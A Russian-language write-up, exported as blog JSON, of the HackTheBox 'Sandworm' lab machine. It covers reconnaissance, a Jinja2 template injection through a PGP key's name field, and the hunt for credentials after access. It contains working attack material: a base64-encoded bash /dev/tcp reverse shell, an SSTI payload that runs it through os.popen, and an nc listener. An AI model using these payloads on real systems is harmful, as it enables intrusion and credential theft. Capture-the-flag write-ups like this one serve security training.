{"id":876,"date":"2023-11-18T18:00:00","date_gmt":"2023-11-18T15:00:00","guid":{"rendered":"https:\/\/seq.team\/?p=876"},"modified":"2025-12-02T15:16:19","modified_gmt":"2025-12-02T12:16:19","slug":"razbor-hackthebox-sandworm-medium","status":"publish","type":"post","link":"https:\/\/seq.team\/en\/blog\/razbor-hackthebox-sandworm-medium\/","title":{"rendered":"\u0420\u0430\u0437\u0431\u043e\u0440 HackTheBox – Sandworm (Medium)"},"content":{"rendered":"\n
\n
\n
\u0421\u043b\u043e\u0436\u043d\u043e\u0441\u0442\u044c:<\/td>Medium<\/td><\/tr>
\u041e\u0421:<\/td>Linux<\/td><\/tr>
\u0411\u0430\u043b\u043b\u044b:<\/td>30<\/td><\/tr>
IP:<\/td>10.10.11.218<\/td><\/tr>
\u0422\u0435\u0433\u0438:<\/td>PGP, SSTI, Firejail, SUID Binary, Code Analysis, CVE-2022-31214<\/td><\/tr><\/tbody><\/table><\/figure>\n<\/div>\n\n\n\n
<\/div>\n<\/div>\n\n\n\n

\u041a\u0440\u0430\u0442\u043a\u043e\u0435 \u043e\u043f\u0438\u0441\u0430\u043d\u0438\u0435 \u0440\u0435\u0448\u0435\u043d\u0438\u044f<\/h3>\n\n\n\n

\u041f\u043e\u0441\u043b\u0435 \u043f\u0435\u0440\u0432\u0438\u0447\u043d\u043e\u0439 \u0440\u0430\u0437\u0432\u0435\u0434\u043a\u0438 \u0432\u0435\u0431-\u043f\u0440\u0438\u043b\u043e\u0436\u0435\u043d\u0438\u044f \u043c\u044b \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0438\u0432\u0430\u0435\u043c \u0441\u0435\u0440\u0432\u0438\u0441 \u043f\u0440\u043e\u0432\u0435\u0440\u043a\u0438 \u043a\u043e\u0440\u0440\u0435\u043a\u0442\u043d\u043e\u0441\u0442\u0438 PGP \u043f\u043e\u0434\u043f\u0438\u0441\u0438, \u0443\u044f\u0437\u0432\u0438\u043c\u044b\u0439 \u043a SSTI. \u0421 \u043f\u043e\u043c\u043e\u0449\u044c\u044e SSTI \u043f\u043e\u043b\u0443\u0447\u0438\u043b\u0438 \u043e\u0433\u0440\u0430\u043d\u0438\u0447\u0435\u043d\u043d\u044b\u0439 \u0434\u043e\u0441\u0442\u0443\u043f \u043a \u0443\u0447\u0451\u0442\u043d\u043e\u0439 \u0437\u0430\u043f\u0438\u0441\u0438 atlas<\/strong><\/code> \u0438\u0437-\u0437\u0430 \u0440\u0430\u0431\u043e\u0442\u044b Firejail<\/code>. \u0414\u0430\u043b\u0435\u0435, \u0432 \u0445\u043e\u0434\u0435 \u0440\u0430\u0437\u0432\u0435\u0434\u043a\u0438 \u043b\u043e\u043a\u0430\u043b\u044c\u043d\u044b\u0445 \u0444\u0430\u0439\u043b\u043e\u0432 \u0432 \u0434\u043e\u043c\u0430\u0448\u043d\u0435\u0439 \u0434\u0438\u0440\u0435\u043a\u0442\u043e\u0440\u0438\u0438 (\/.config\/httpie\/sessions\/localhost_5000\/admin.json<\/code>) \u043d\u0430\u0448\u043b\u0438 \u043f\u0430\u0440\u043e\u043b\u044c SSH \u0443\u0447\u0451\u0442\u043d\u043e\u0439 \u0437\u0430\u043f\u0438\u0441\u0438 silentobserver<\/strong><\/code>, \u043f\u043e\u0434\u043a\u043b\u044e\u0447\u0438\u043b\u0438\u0441\u044c \u043a \u0446\u0435\u043b\u0435\u0432\u043e\u0439 \u043c\u0430\u0448\u0438\u043d\u0435 \u0438 \u043f\u043e\u043b\u0443\u0447\u0438\u043b\u0438 \u0441\u043e\u043e\u0442\u0432\u0435\u0442\u0441\u0442\u0432\u0443\u044e\u0449\u0438\u0439 \u0435\u043c\u0443 \u0444\u043b\u0430\u0433 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044f. \u0421 \u043f\u043e\u043c\u043e\u0449\u044c\u044e \u043c\u043e\u0434\u0438\u0444\u0438\u043a\u0430\u0446\u0438\u0438 \u043e\u0434\u043d\u043e\u0439 \u0438\u0437 \u0431\u0438\u0431\u043b\u0438\u043e\u0442\u0435\u043a, \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u044e\u0449\u0438\u0445\u0441\u044f \u0432 \/opt\/tipnet<\/code> \u0438 \u043f\u0435\u0440\u0438\u043e\u0434\u0438\u0447\u0435\u0441\u043a\u043e\u0433\u043e \u0444\u043e\u043d\u043e\u0432\u043e\u0433\u043e \u0437\u0430\u043f\u0443\u0441\u043a\u0430 \u044d\u0442\u043e\u0433\u043e \u0431\u0438\u043d\u0430\u0440\u043d\u043e\u0433\u043e \u0444\u0430\u0439\u043b\u0430 \u043e\u0442 \u043b\u0438\u0446\u0430 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044f atlas<\/strong><\/code> \u043f\u043e\u043b\u0443\u0447\u0438\u043b\u0438 \u043f\u043e\u043b\u043d\u043e\u0446\u0435\u043d\u043d\u044b\u0439 \u0434\u043e\u0441\u0442\u0443\u043f \u043a \u0423\u0417 atlas<\/strong><\/code>. \u0412 \u043a\u043e\u043d\u0435\u0447\u043d\u043e\u043c \u0441\u0447\u0451\u0442\u0435, \u043e\u0441\u0443\u0449\u0435\u0441\u0442\u0432\u0438\u043b\u0438 \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u044e CVE-2022-31214<\/code>, \u043f\u043e\u043b\u0443\u0447\u0438\u043b\u0438 \u0434\u043e\u0441\u0442\u0443\u043f \u043a root<\/strong><\/code> \u0438 \u0441\u043e\u043e\u0442\u0432\u0435\u0442\u0441\u0442\u0432\u0443\u044e\u0449\u0435\u043c\u0443 \u0444\u043b\u0430\u0433\u0443.<\/p>\n\n\n\n

\u0424\u0430\u0437\u0430 \u0440\u0430\u0437\u0432\u0435\u0434\u043a\u0438<\/h3>\n\n\n\n

\u041f\u0440\u043e\u0432\u0435\u0434\u0451\u043c \u043f\u0435\u0440\u0432\u0438\u0447\u043d\u043e\u0435 \u0441\u043a\u0430\u043d\u0438\u0440\u043e\u0432\u0430\u043d\u0438\u0435 \u0446\u0435\u043b\u0438: <\/p>\n\n\n\n

\n

nmap -sS -p- 10.10.11.218<\/p>\n<\/blockquote>\n\n\n

\nPORT      STATE   SERVICE\n22\/tcp    open    ssh\n80\/tcp    open    http\n443\/tcp   open    ssl\/http\n<\/pre><\/div>\n\n\n
\u041f\u0440\u043e\u0441\u043a\u0430\u043d\u0438\u0440\u0443\u0435\u043c \u0431\u043e\u043b\u0435\u0435 \u043f\u043e\u0434\u0440\u043e\u0431\u043d\u043e: nmap -sVC -O -p22,80,443 10.10.11.218<\/code><\/p>\n\n\n\n
\n
nmap -sVC -O -p22,80,3000 10.10.11.218<\/code><\/p>\n<\/blockquote>\n\n\n
\n22\/tcp  open  ssh      OpenSSH 8.9p1 Ubuntu 3ubuntu0.1 (Ubuntu Linux; protocol 2.0)\n| ssh-hostkey: \n|   256 b7:89:6c:0b:20:ed:49:b2:c1:86:7c:29:92:74:1c:1f (ECDSA)\n|_  256 18:cd:9d:08:a6:21:a8:b8:b6:f7:9f:8d:40:51:54:fb (ED25519)\n80\/tcp  open  http     nginx 1.18.0 (Ubuntu)\n|_http-server-header: nginx\/1.18.0 (Ubuntu)\n|_http-title: Did not follow redirect to https:\/\/ssa.htb\/\n443\/tcp open  ssl\/http nginx 1.18.0 (Ubuntu)\n| ssl-cert: Subject: commonName=SSA\/organizationName=Secret Spy Agency\/stateOrProvinceName=Classified\/countryName=SA\n| Not valid before: 2023-05-04T18:03:25\n|_Not valid after:  2050-09-19T18:03:25\n|_http-title: 400 The plain HTTP request was sent to HTTPS port\n|_http-server-header: nginx\/1.18.0 (Ubuntu)\n<\/pre><\/div>\n\n\n
\u0421\u0440\u0430\u0437\u0443 \u0436\u0435 \u0434\u043e\u0431\u0430\u0432\u0438\u043c \u0434\u043e\u043c\u0435\u043d \u0432 \/etc\/hosts<\/code>:<\/p>\n\n\n
\n# HTB\n10.10.11.218    saa.htb\n<\/pre><\/div>\n\n\n
\u041f\u0440\u043e\u0432\u0435\u0434\u0451\u043c \u0440\u0430\u0437\u0432\u0435\u0434\u043a\u0443 \u043d\u0430 \u0432\u0435\u0431 \u0441\u0435\u0440\u0432\u0438\u0441\u0435 – \u043e\u0437\u043d\u0430\u043a\u043e\u043c\u0438\u043c\u0441\u044f \u0441 \u0444\u0443\u043d\u043a\u0446\u0438\u043e\u043d\u0430\u043b\u043e\u043c \u0438 \u043f\u0440\u043e\u0441\u043a\u0430\u043d\u0438\u0440\u0443\u0435\u043c \u0434\u0438\u0440\u0435\u043a\u0442\u043e\u0440\u0438\u0438:<\/p>\n\n\n
\n
\"\"<\/figure><\/div>\n\n\n
<\/p>\n\n\n\n
\u0414\u0430\u043b\u0435\u0435 \u0441\u043b\u0435\u0434\u0443\u0435\u0442 \u0441\u043a\u0430\u043d\u0438\u0440\u043e\u0432\u0430\u043d\u0438\u0435 \u0434\u0438\u0440\u0435\u043a\u0442\u043e\u0440\u0438\u0439 \u0434\u043e\u0441\u0442\u0443\u043f\u043d\u044b\u0445 \u0432 \u044d\u0442\u043e\u043c \u0441\u0435\u0440\u0432\u0438\u0441\u0435 \u043d\u0430 \u043f\u0440\u0435\u0434\u043c\u0435\u0442 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0433\u043e \u0444\u0443\u043d\u043a\u0446\u0438\u043e\u043d\u0430\u043b\u0430:<\/p>\n\n\n
\ngobuster dir -u https:\/\/ssa.htb -w \/usr\/share\/wordlists\/seclists\/Discovery\/Web-Content\/directory-list-2.3-medium.txt -k\n<\/pre><\/div>\n\n\n
\u041f\u043e\u043b\u0443\u0447\u0438\u043b\u0438 \u0441\u043b\u0435\u0434\u0443\u044e\u0449\u0438\u0439 \u0440\u0435\u0437\u0443\u043b\u044c\u0442\u0430\u0442:<\/p>\n\n\n
\n\/contact              (Status: 200) [Size: 3543]\n\/about                (Status: 200) [Size: 5584]\n\/login                (Status: 200) [Size: 4392]\n\/view                 (Status: 302) [Size: 225] [--&gt; \/login?next=%2Fview]\n\/admin                (Status: 302) [Size: 227] [--&gt; \/login?next=%2Fadmin]\n\/guide                (Status: 200) [Size: 9043]\n\/pgp                  (Status: 200) [Size: 3187]\n\/logout               (Status: 302) [Size: 229] [--&gt; \/login?next=%2Flogout]\n\/process              (Status: 405) [Size: 153]\n<\/pre><\/div>\n\n\n
\u041f\u0440\u0438 \u043f\u0435\u0440\u0435\u0445\u043e\u0434\u0435 \u043f\u043e \u0430\u0434\u0440\u0435\u0441\u0443 https:\/\/ssa.htb\/pgp<\/code> \u043f\u043e\u043b\u0443\u0447\u0430\u0435\u043c \u043f\u0443\u0431\u043b\u0438\u0447\u043d\u044b\u0439 \u043a\u043b\u044e\u0447:<\/p>\n\n\n
\n-----BEGIN PGP PUBLIC KEY BLOCK-----\nmQINBGRTz6YBEADA4xA4OQsDznyYLTi36TM769G\/APBzGiTN3m140P9pOcA2VpgX\n[...]\nFxEcPBaB0bhe5Fh7fQ811EMG1Q6Rq\/mr8o8bUfHh=P8U3\n-----END PGP PUBLIC KEY BLOCK-----\n<\/pre><\/div>\n\n\n
\u041f\u043e\u043b\u0443\u0447\u0435\u043d\u0438\u0435 \u0434\u043e\u0441\u0442\u0443\u043f\u0430 \u043a \u0446\u0435\u043b\u0435\u0432\u043e\u0439 \u043c\u0430\u0448\u0438\u043d\u0435 \u0441 \u043f\u043e\u043c\u043e\u0449\u044c\u044e SSTI Jinja2<\/h3>\n\n\n\n
\u041c\u043e\u0436\u043d\u043e \u0437\u0430\u043c\u0435\u0442\u0438\u0442\u044c, \u0447\u0442\u043e \u043f\u043e \u0441\u0441\u044b\u043b\u043a\u0435 https:\/\/ssa.htb\/guide<\/code> \u0434\u043e\u0441\u0442\u0443\u043f\u043d\u0430 \u0434\u0435\u043c\u043e\u043d\u0441\u0442\u0440\u0430\u0446\u0438\u044f \u0440\u0430\u0431\u043e\u0442\u044b \u0441\u0435\u0440\u0432\u0438\u0441\u0430 \u043f\u043e \u0448\u0438\u0444\u0440\u043e\u0432\u0430\u043d\u0438\u044e\/\u0434\u0435\u0448\u0438\u0444\u0440\u043e\u0432\u0430\u043d\u0438\u044e \u0441\u043e\u043e\u0431\u0449\u0435\u043d\u0438\u0439 \u0441 \u043f\u043e\u043c\u043e\u0449\u044c\u044e PGP-\u043a\u043b\u044e\u0447\u0435\u0439:<\/p>\n\n\n
\n
\"\"<\/figure><\/div>\n\n\n
<\/p>\n\n\n\n
\u041f\u043e\u0441\u043b\u0435 \u043c\u043d\u043e\u0436\u0435\u0441\u0442\u0432\u0435\u043d\u043d\u044b\u0445 \u043f\u043e\u043f\u044b\u0442\u043e\u043a \u0432\u0437\u0430\u0438\u043c\u043e\u0434\u0435\u0439\u0441\u0442\u0432\u0438\u044f \u0441 \u0434\u043e\u0441\u0442\u0443\u043f\u043d\u044b\u043c \u0444\u0443\u043d\u043a\u0446\u0438\u043e\u043d\u0430\u043b\u043e\u043c \u0432\u0435\u0431-\u0441\u0435\u0440\u0432\u0438\u0441\u0430 \u0431\u044b\u043b\u043e \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0435\u043d\u043e, \u0447\u0442\u043e \u043e\u043d \u0443\u044f\u0437\u0432\u0438\u043c \u043a SSTI. \u0414\u043b\u044f \u0442\u043e\u0433\u043e, \u0447\u0442\u043e\u0431\u044b \u043f\u0440\u043e\u0434\u0435\u043c\u043e\u043d\u0441\u0442\u0440\u0438\u0440\u043e\u0432\u0430\u0442\u044c \u043d\u0430\u043b\u0438\u0447\u0438\u0435 \u0434\u0430\u043d\u043d\u043e\u0439 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u0441\u0433\u0435\u043d\u0435\u0440\u0438\u0440\u0443\u0435\u043c gpg-\u043a\u043b\u044e\u0447 \u0441 \u0438\u043d\u044a\u0435\u043a\u0446\u0438\u0435\u0439 \u0432 \u043f\u043e\u043b\u0435 \u0438\u043c\u0435\u043d\u0438:<\/p>\n\n\n
\ngpg --gen-key\ngpg -a -o public.key --export evil\necho 'life-time' | gpg --clear-sign\ngpg --edit-key evil@gmail.com\ngpg &gt; adduid\n\u0421\u043c\u0435\u043d\u0438\u043c \u0438\u043c\u044f \u043d\u0430: \u2192 {{7*7}} \u2190 \u0438\u043d\u044a\u0435\u043a\u0446\u0438\u044f SSTI \ngpg &gt; trust\ngpg &gt; uid 1\ngpg &gt; deluid\ngpg &gt; save\n<\/pre><\/div>\n\n\n
\u0414\u0430\u043b\u0435\u0435, \u0441 \u043f\u043e\u043c\u043e\u0449\u044c\u044e \u044d\u0442\u043e\u0433\u043e \u043a\u043b\u044e\u0447\u0430 \u0437\u0430\u043a\u043e\u0434\u0438\u0440\u0443\u0435\u043c PGP \u0441\u043e\u043e\u0431\u0449\u0435\u043d\u0438\u0435 \u0432 \u0440\u0430\u0437\u0434\u0435\u043b\u0435 Encrypt Message. \u042d\u0442\u043e\u0442 \u0436\u0435 \u043a\u043b\u044e\u0447 \u0438 \u043f\u043e\u043b\u0443\u0447\u0435\u043d\u043d\u043e\u0435 \u0441\u043e\u043e\u0431\u0449\u0435\u043d\u0438\u0435 \u0432\u0441\u0442\u0430\u0432\u0438\u043c \u0432 \u043f\u043e\u043b\u0435 Public Key \u0438 Signed Text. \u041f\u043e\u0441\u043b\u0435 \u0437\u0430\u043f\u0440\u043e\u0441\u0430 \u043f\u0440\u043e\u0432\u0435\u0440\u043a\u0438 \u043f\u043e\u0434\u043f\u0438\u0441\u0438 \u043f\u043e\u043b\u0443\u0447\u0438\u043c \u0441\u043b\u0435\u0434\u0443\u044e\u0449\u0435\u0435 \u0441\u043e\u043e\u0431\u0449\u0435\u043d\u0438\u0435:<\/p>\n\n\n
\nSignature Verification Result\nSignature is valid! [GNUPG:] NEWSIG evil@gmail.com:Signature made\n[...]\ngpg: Good signature from "49" [unknown]\n[...]\n<\/pre><\/div>\n\n\n
\u0414\u0430\u043b\u0435\u0435, \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u044f \u043f\u043e\u043b\u0435\u0437\u043d\u0443\u044e \u043d\u0430\u0433\u0440\u0443\u0437\u043a\u0443 {{7*'7'}}<\/code> \u043c\u044b \u043c\u043e\u0436\u0435\u043c \u0441\u0443\u0437\u0438\u0442\u044c \u0441\u043f\u0438\u0441\u043e\u043a \u043e\u0431\u0440\u0430\u0431\u043e\u0442\u0447\u0438\u043a\u043e\u0432 \u0442\u0435\u043c\u043f\u043b\u0435\u0439\u0442\u043e\u0432, \u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u0442\u0441\u044f \u043d\u0430 \u0446\u0435\u043b\u0435\u0432\u043e\u043c  \u0441\u0435\u0440\u0432\u0438\u0441\u0435 \u0434\u043e Jinja2<\/code> \u0438\u043b\u0438 Twig<\/code>. <\/p>\n\n\n\n
\u0412\u043e\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u043c\u0441\u044f \u0441\u043f\u0438\u0441\u043a\u043e\u043c \u043f\u043e\u043b\u0435\u0437\u043d\u044b\u0445 \u043d\u0430\u0433\u0440\u0443\u0437\u043e\u043a \u0434\u043b\u044f \u0434\u0430\u043d\u043d\u044b\u0445 \u043e\u0431\u0440\u0430\u0431\u043e\u0442\u0447\u0438\u043a\u043e\u0432 \u0438 \u0441\u0444\u043e\u0440\u043c\u0438\u0440\u0443\u0435\u043c \u043f\u043e\u043b\u0435\u0437\u043d\u0443\u044e \u043d\u0430\u0433\u0440\u0443\u0437\u043a\u0443 \u0434\u043b\u044f \u043f\u043e\u043b\u0443\u0447\u0435\u043d\u0438\u044f \u043f\u0435\u0440\u0432\u043e\u043d\u0430\u0447\u0430\u043b\u044c\u043d\u043e\u0433\u043e \u0434\u043e\u0441\u0442\u0443\u043f\u0430 \u043d\u0430 \u0446\u0435\u043b\u0435\u0432\u043e\u0439 \u043c\u0430\u0448\u0438\u043d\u0435. \u0414\u043b\u044f \u043d\u0430\u0447\u0430\u043b\u0430 \u0437\u0430\u043a\u043e\u0434\u0438\u0440\u0443\u0435\u043c \u0441\u043b\u0435\u0434\u0443\u044e\u0449\u0443\u044e \u043a\u043e\u043c\u0430\u043d\u0434\u0443 \u043f\u043e\u043b\u0443\u0447\u0435\u043d\u0438\u044f Reverse Shell \u0432 base64: echo \"bash -i >& \/dev\/tcp\/10.10.16.10\/7331 0>&1\" | base64<\/code><\/p>\n\n\n\n
\u041f\u043e\u043b\u0443\u0447\u0438\u043b\u0438:  YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNi4xMC83MzMxIDA+JjEK<\/code><\/p>\n\n\n\n
\u0417\u0430\u0442\u0435\u043c, \u0441 \u043f\u043e\u043c\u043e\u0449\u044c\u044e SSTI \u0438 \u043f\u043e\u043b\u0435\u0437\u043d\u043e\u0439 \u043d\u0430\u0433\u0440\u0443\u0437\u043a\u0438 \u0434\u043b\u044f Jinja2 \u0441\u0444\u043e\u0440\u043c\u0438\u0440\u0443\u0435\u043c \u0441\u043b\u0435\u0434\u0443\u044e\u0449\u0443\u044e \u0438\u043d\u044a\u0435\u043a\u0446\u0438\u044e \u0432 \u043f\u0430\u0440\u0430\u043c\u0435\u0442\u0440 \u0438\u043c\u0435\u043d\u0438 \u043a\u043b\u044e\u0447\u0430 PGP, \u0441 \u043f\u043e\u043c\u043e\u0449\u044c\u044e \u043a\u043e\u0442\u043e\u0440\u043e\u0439 \u043f\u043e\u043b\u0443\u0447\u0438\u043c \u0434\u043e\u0441\u0442\u0443\u043f \u043d\u0430 \u0446\u0435\u043b\u0435\u0432\u043e\u0439 \u043c\u0430\u0448\u0438\u043d\u0435:<\/p>\n\n\n
\n{{ self.__init__.__globals__.__builtins__.__import__('os').popen('bash -c "echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNC4xMi80NDQ0IDA+JjEK | base64 -d | bash" ').read() }\n<\/pre><\/div>\n\n\n
\u0421\u043e\u0437\u0434\u0430\u0434\u0438\u043c \u043f\u043e\u0434\u043f\u0438\u0441\u044c \u0441 \u0442\u0430\u043a\u0438\u043c \u043f\u0430\u0440\u0430\u043c\u0435\u0442\u0440\u043e\u043c \u0438\u043c\u0435\u043d\u0438 \u0432 \u043a\u043b\u044e\u0447\u0435, \u0437\u0430\u043a\u043e\u0434\u0438\u0440\u0443\u0435\u043c \u0441\u043e\u043e\u0431\u0449\u0435\u043d\u0438\u0435 \u0438 \u0432\u0435\u0440\u0438\u0444\u0438\u0446\u0438\u0440\u0443\u0435\u043c \u043f\u043e\u0434\u043f\u0438\u0441\u044c. \u041f\u0440\u0435\u0434\u0432\u0430\u0440\u0438\u0442\u0435\u043b\u044c\u043d\u043e \u043e\u0442\u043a\u0440\u044b\u0432 \u043f\u043e\u0440\u0442 7331 \u043d\u0430 \u0443\u0434\u0430\u043b\u0451\u043d\u043d\u043e\u0439 \u043c\u0430\u0448\u0438\u043d\u0435 \u0430\u0442\u0430\u043a\u0443\u044e\u0449\u0435\u0433\u043e \u0441 \u043f\u043e\u043c\u043e\u0449\u044c\u044e nc -nvlp 7331<\/code> \u043f\u043e\u043b\u0443\u0447\u0438\u043c \u0434\u043e\u0441\u0442\u0443\u043f \u0441 \u043b\u043e\u043a\u0430\u043b\u044c\u043d\u043e\u0439 \u0423\u0417 atlas<\/strong><\/code>:<\/p>\n\n\n
\n
\"\"<\/figure><\/div>\n\n\n
<\/p>\n\n\n\n
\u041f\u043e\u0432\u044b\u0448\u0435\u043d\u0438\u0435 \u043f\u0440\u0438\u0432\u0438\u043b\u0435\u0433\u0438\u0439 \u0434\u043e \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044f silentobserver<\/h3>\n\n\n\n
\u0412\u044b\u0432\u0435\u0434\u0435\u043c \u0441\u043f\u0438\u0441\u043e\u043a \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u0435\u0439 \u0441 \u043f\u043e\u043c\u043e\u0449\u044c\u044e cat \/etc\/passwd<\/code> \u0438 \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0438\u043c \u0435\u0449\u0451 \u043e\u0434\u043d\u0443 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044c\u0441\u043a\u0443\u044e \u0443\u0447\u0451\u0442\u043d\u0443\u044e \u0437\u0430\u043f\u0438\u0441\u044c silentobserver<\/strong><\/code>:<\/p>\n\n\n
\nroot:x:0:0:root:\/root:\/bin\/bash\ndaemon:x:1:1:daemon:\/usr\/sbin:\/usr\/sbin\/nologin\nbin:x:2:2:bin:\/bin:\/usr\/sbin\/nologin\nsys:x:3:3:sys:\/dev:\/usr\/sbin\/nologin\nsync:x:4:65534:sync:\/bin:\/bin\/sync\ngames:x:5:60:games:\/usr\/games:\/usr\/sbin\/nologin\nman:x:6:12:man:\/var\/cache\/man:\/usr\/sbin\/nologin\nlp:x:7:7:lp:\/var\/spool\/lpd:\/usr\/sbin\/nologin\nmail:x:8:8:mail:\/var\/mail:\/usr\/sbin\/nologin\nnews:x:9:9:news:\/var\/spool\/news:\/usr\/sbin\/nologin\nuucp:x:10:10:uucp:\/var\/spool\/uucp:\/usr\/sbin\/nologin\nproxy:x:13:13:proxy:\/bin:\/usr\/sbin\/nologin\nwww-data:x:33:33:www-data:\/var\/www:\/usr\/sbin\/nologin\nbackup:x:34:34:backup:\/var\/backups:\/usr\/sbin\/nologin\nlist:x:38:38:Mailing List Manager:\/var\/list:\/usr\/sbin\/nologin\nirc:x:39:39:ircd:\/run\/ircd:\/usr\/sbin\/nologin\ngnats:x:41:41:Gnats Bug-Reporting System (admin):\/var\/lib\/gnats:\/usr\/sbin\/nologin\nnobody:x:65534:65534:nobody:\/nonexistent:\/usr\/sbin\/nologin\nsystemd-network:x:100:102:systemd Network Management,,,:\/run\/systemd:\/usr\/sbin\/nologin\nsystemd-resolve:x:101:103:systemd Resolver,,,:\/run\/systemd:\/usr\/sbin\/nologin\nsystemd-timesync:x:102:104:systemd Time Synchronization,,,:\/run\/systemd:\/usr\/sbin\/nologin\nmessagebus:x:103:106::\/nonexistent:\/usr\/sbin\/nologin\nsyslog:x:104:110::\/home\/syslog:\/usr\/sbin\/nologin\n_apt:x:105:65534::\/nonexistent:\/usr\/sbin\/nologin\ntss:x:106:111:TPM software stack,,,:\/var\/lib\/tpm:\/bin\/false\nuuidd:x:107:112::\/run\/uuidd:\/usr\/sbin\/nologin\ntcpdump:x:108:113::\/nonexistent:\/usr\/sbin\/nologin\nlandscape:x:109:115::\/var\/lib\/landscape:\/usr\/sbin\/nologin\npollinate:x:110:1::\/var\/cache\/pollinate:\/bin\/false\nsshd:x:111:65534::\/run\/sshd:\/usr\/sbin\/nologin\nsystemd-coredump:x:999:999:systemd Core Dumper:\/:\/usr\/sbin\/nologin\nlxd:x:998:100::\/var\/snap\/lxd\/common\/lxd:\/bin\/false\nusbmux:x:112:46:usbmux daemon,,,:\/var\/lib\/usbmux:\/usr\/sbin\/nologin\nfwupd-refresh:x:113:118:fwupd-refresh user,,,:\/run\/systemd:\/usr\/sbin\/nologin\nmysql:x:114:120:MySQL Server,,,:\/nonexistent:\/bin\/false\nsilentobserver:x:1001:1001::\/home\/silentobserver:\/bin\/bash\natlas:x:1000:1000::\/home\/atlas:\/bin\/bash\n_laurel:x:997:997::\/var\/log\/laurel:\/bin\/false\n<\/pre><\/div>\n\n\n
\u041f\u0440\u0438 \u043f\u043e\u043f\u044b\u0442\u043a\u0435 \u0438\u0441\u043f\u043e\u043b\u043d\u0438\u0442\u044c \u0440\u044f\u0434 \u0441\u0442\u0430\u043d\u0434\u0430\u0440\u0442\u043d\u044b\u0445 Linux \u0443\u0442\u0438\u043b\u0438\u0442 \u043f\u043e\u043b\u0443\u0447\u0430\u0435\u043c \u043e\u0448\u0438\u0431\u043a\u0443 \u043e \u0442\u043e\u043c, \u0447\u0442\u043e:<\/p>\n\n\n
\n[...]\nCould not find command-not-found database. Run 'sudo apt update' to populate it.\ncommand_name: command not found\n[...]\n<\/pre><\/div>\n\n\n
\u041f\u0440\u043e\u0432\u043e\u0434\u044f \u043b\u043e\u043a\u0430\u043b\u044c\u043d\u0443\u044e \u0440\u0430\u0437\u0432\u0435\u0434\u043a\u0443 \u0434\u0438\u0440\u0435\u043a\u0442\u043e\u0440\u0438\u0439 \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0438\u043c \u0434\u0438\u0440\u0435\u043a\u0442\u043e\u0440\u0438\u044e .config<\/code>, \u0432 \u043a\u043e\u0442\u043e\u0440\u043e\u0439 \u0441\u043e\u0434\u0435\u0440\u0436\u0430\u0442\u0441\u044f \u0441\u043b\u0435\u0434\u0443\u044e\u0449\u0438\u0435 \u043f\u0430\u043f\u043a\u0438:<\/p>\n\n\n
\n
\"\"<\/figure><\/div>\n\n\n
<\/p>\n\n\n\n
\u041e\u0442\u0441\u044e\u0434\u0430 \u043c\u044b \u043c\u043e\u0436\u0435\u043c \u0441\u0434\u0435\u043b\u0430\u0442\u044c \u0432\u044b\u0432\u043e\u0434, \u0447\u0442\u043e \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044c atlas<\/strong><\/code> \u0440\u0430\u0431\u043e\u0442\u0430\u0435\u0442 \u0432 \u043e\u043a\u0440\u0443\u0436\u0435\u043d\u0438\u0438, \u043e\u0433\u0440\u0430\u043d\u0438\u0447\u0435\u043d\u043d\u043e\u043c \u0441 \u043f\u043e\u043c\u043e\u0449\u044c\u044e Firejail<\/code>. \u041d\u043e, \u043d\u0435 \u0441\u043c\u043e\u0442\u0440\u044f \u043d\u0430 \u0442\u043e, \u0447\u0442\u043e \u0434\u043e\u0441\u0442\u0443\u043f \u043a \u0443\u0442\u0438\u043b\u0438\u0442\u0430\u043c \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044f atlas <\/strong><\/code>\u043e\u0433\u0440\u0430\u043d\u0438\u0447\u0435\u043d \u0443\u0434\u0430\u043b\u043e\u0441\u044c \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0438\u0442\u044c \u0443\u0447\u0451\u0442\u043d\u044b\u0435 \u0434\u0430\u043d\u043d\u044b\u0435 \u043b\u043e\u043a\u0430\u043b\u044c\u043d\u043e\u0433\u043e \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044f silentobserver<\/strong><\/code> \u0432 \u0444\u0430\u0439\u043b\u0435 admin.json, \u0440\u0430\u0441\u043f\u043e\u043b\u043e\u0436\u0435\u043d\u043d\u043e\u043c \u0432 \u0434\u043e\u043c\u0430\u0448\u043d\u0435\u0439 \u0434\u0438\u0440\u0435\u043a\u0442\u043e\u0440\u0438\u0438 atlas: ~\/.config\/httpie\/sessions\/localhost_5000\/admin.json<\/code><\/p>\n\n\n
